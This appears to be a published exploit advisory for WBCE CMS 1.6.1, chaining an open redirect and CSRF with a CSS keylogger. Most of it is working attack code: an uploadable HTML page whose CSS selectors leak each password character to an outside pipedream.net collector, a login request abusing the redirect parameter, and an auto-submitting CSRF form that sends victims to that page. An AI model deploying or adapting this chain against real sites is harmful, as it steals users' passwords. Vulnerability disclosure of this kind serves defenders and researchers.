Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
Version: 1.6.1
Bugs: Open Redirect + CSRF = CSS KEYLOGGING
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date of found: 03-07-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
1. Login to Account
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
3. Then you upload html file .(html file content is as below)
'''
<html>
<head>
<title>
Login
</title>
<style>
input[type="password"][value*="q"]{
background-image: url('https://enflownwx6she.x.pipedream.net/q');}
input[type="password"][value*="w"]{
background-image: url('https://enflownwx6she.x.pipedream.net/w');}
input[type="password"][value*="e"]{
background-image: url('https://enflownwx6she.x.pipedream.net/e');}
input[type="password"][value*="r"]{
background-image: url('https://enflownwx6she.x.pipedream.net/r');}
input[type="password"][value*="t"]{
background-image: url('https://enflownwx6she.x.pipedream.net/t');}
input[type="password"][value*="y"]{
background-image: url('https://enflownwx6she.x.pipedream.net/y');}
input[type="password"][value*="u"]{
background-image: url('https://enflownwx6she.x.pipedream.net/u');}
input[type="password"][value*="i"]{
background-image: url('https://enflownwx6she.x.pipedream.net/i');}
input[type="password"][value*="o"]{
background-image: url('https://enflownwx6she.x.pipedream.net/o');}
input[type="password"][value*="p"]{
background-image: url('https://enflownwx6she.x.pipedream.net/p');}
input[type="password"][value*="a"]{
background-image: url('https://enflownwx6she.x.pipedream.net/a');}
input[type="password"][value*="s"]{
background-image: url('https://enflownwx6she.x.pipedream.net/s');}
input[type="password"][value*="d"]{
background-image: url('https://enflownwx6she.x.pipedream.net/d');}
input[type="password"][value*="f"]{
background-image: url('https://enflownwx6she.x.pipedream.net/f');}
input[type="password"][value*="g"]{
background-image: url('https://enflownwx6she.x.pipedream.net/g');}
input[type="password"][value*="h"]{
background-image: url('https://enflownwx6she.x.pipedream.net/h');}
input[type="password"][value*="j"]{
background-image: url('https://enflownwx6she.x.pipedream.net/j');}
input[type="password"][value*="k"]{
background-image: url('https://enflownwx6she.x.pipedream.net/k');}
input[type="password"][value*="l"]{
background-image: url('https://enflownwx6she.x.pipedream.net/l');}
input[type="password"][value*="z"]{
background-image: url('https://enflownwx6she.x.pipedream.net/z');}
input[type="password"][value*="x"]{
background-image: url('https://enflownwx6she.x.pipedream.net/x');}
input[type="password"][value*="c"]{
background-image: url('https://enflownwx6she.x.pipedream.net/c');}
input[type="password"][value*="v"]{
background-image: url('https://enflownwx6she.x.pipedream.net/v');}
input[type="password"][value*="b"]{
background-image: url('https://enflownwx6she.x.pipedream.net/b');}
input[type="password"][value*="n"]{
background-image: url('https://enflownwx6she.x.pipedream.net/n');}
input[type="password"][value*="m"]{
background-image: url('https://enflownwx6she.x.pipedream.net/m');}
input[type="password"][value*="Q"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
input[type="password"][value*="W"]{
background-image: url('https://enflownwx6she.x.pipedream.net/W');}
input[type="password"][value*="E"]{
background-image: url('https://enflownwx6she.x.pipedream.net/E');}
input[type="password"][value*="R"]{
background-image: url('https://enflownwx6she.x.pipedream.net/R');}
input[type="password"][value*="T"]{
background-image: url('https://enflownwx6she.x.pipedream.net/T');}
input[type="password"][value*="Y"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
input[type="password"][value*="U"]{
background-image: url('https://enflownwx6she.x.pipedream.net/U');}
input[type="password"][value*="I"]{
background-image: url('https://enflownwx6she.x.pipedream.net/I');}
input[type="password"][value*="O"]{
background-image: url('https://enflownwx6she.x.pipedream.net/O');}
input[type="password"][value*="P"]{
background-image: url('https://enflownwx6she.x.pipedream.net/P');}
input[type="password"][value*="A"]{
background-image: url('https://enflownwx6she.x.pipedream.net/A');}
input[type="password"][value*="S"]{
background-image: url('https://enflownwx6she.x.pipedream.net/S');}
input[type="password"][value*="D"]{
background-image: url('https://enflownwx6she.x.pipedream.net/D');}
input[type="password"][value*="F"]{
background-image: url('https://enflownwx6she.x.pipedream.net/F');}
input[type="password"][value*="G"]{
background-image: url('https://enflownwx6she.x.pipedream.net/G');}
input[type="password"][value*="H"]{
background-image: url('https://enflownwx6she.x.pipedream.net/H');}
input[type="password"][value*="J"]{
background-image: url('https://enflownwx6she.x.pipedream.net/J');}
input[type="password"][value*="K"]{
background-image: url('https://enflownwx6she.x.pipedream.net/K');}
input[type="password"][value*="L"]{
background-image: url('https://enflownwx6she.x.pipedream.net/L');}
input[type="password"][value*="Z"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
input[type="password"][value*="X"]{
background-image: url('https://enflownwx6she.x.pipedream.net/X');}
input[type="password"][value*="C"]{
background-image: url('https://enflownwx6she.x.pipedream.net/C');}
input[type="password"][value*="V"]{
background-image: url('https://enflownwx6she.x.pipedream.net/V');}
input[type="password"][value*="B"]{
background-image: url('https://enflownwx6she.x.pipedream.net/B');}
input[type="password"][value*="N"]{
background-image: url('https://enflownwx6she.x.pipedream.net/N');}
input[type="password"][value*="M"]{
background-image: url('https://enflownwx6she.x.pipedream.net/M');}
input[type="password"][value*="1"]{
background-image: url('https://enflownwx6she.x.pipedream.net/1');}
input[type="password"][value*="2"]{
background-image: url('https://enflownwx6she.x.pipedream.net/2');}
input[type="password"][value*="3"]{
background-image: url('https://enflownwx6she.x.pipedream.net/3');}
input[type="password"][value*="4"]{
background-image: url('https://enflownwx6she.x.pipedream.net/4');}
input[type="password"][value*="5"]{
background-image: url('https://enflownwx6she.x.pipedream.net/5');}
input[type="password"][value*="6"]{
background-image: url('https://enflownwx6she.x.pipedream.net/6');}
input[type="password"][value*="7"]{
background-image: url('https://enflownwx6she.x.pipedream.net/7');}
input[type="password"][value*="8"]{
background-image: url('https://enflownwx6she.x.pipedream.net/8');}
input[type="password"][value*="9"]{
background-image: url('https://enflownwx6she.x.pipedream.net/9');}
input[type="password"][value*="0"]{
background-image: url('https://enflownwx6she.x.pipedream.net/0');}
input[type="password"][value*="-"]{
background-image: url('https://enflownwx6she.x.pipedream.net/-');}
input[type="password"][value*="."]{
background-image: url('https://enflownwx6she.x.pipedream.net/.');}
input[type="password"][value*="_"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
input[type="password"][value*="@"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
input[type="password"][value*="?"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
input[type="password"][value*=">"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
input[type="password"][value*="<"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
input[type="password"][value*="="]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
input[type="password"][value*=":"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
input[type="password"][value*=";"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
</style>
</head>
<body>
<label>Please enter username and password</label>
<br><br>
Password:: <input type="password" />
<script>
document.querySelector('input').addEventListener('keyup', (evt)=>{
evt.target.setAttribute('value', evt.target.value);
})
</script>
</body>
</html>
'''
4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url.
5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)
POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close
url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
6.If write as (https://ATTACKER.com) in url parameter on abowe request on you redirect to attacker.com.
7.We write to html files url
url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html
8.And create csrf-poc with csrf.poc.generator
<html>
<title>
This CSRF was found by miri
</title>
<body>
<h1>
CSRF POC
</h1>
<form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim.
Poc video : https://youtu.be/m-x_rYXTP9E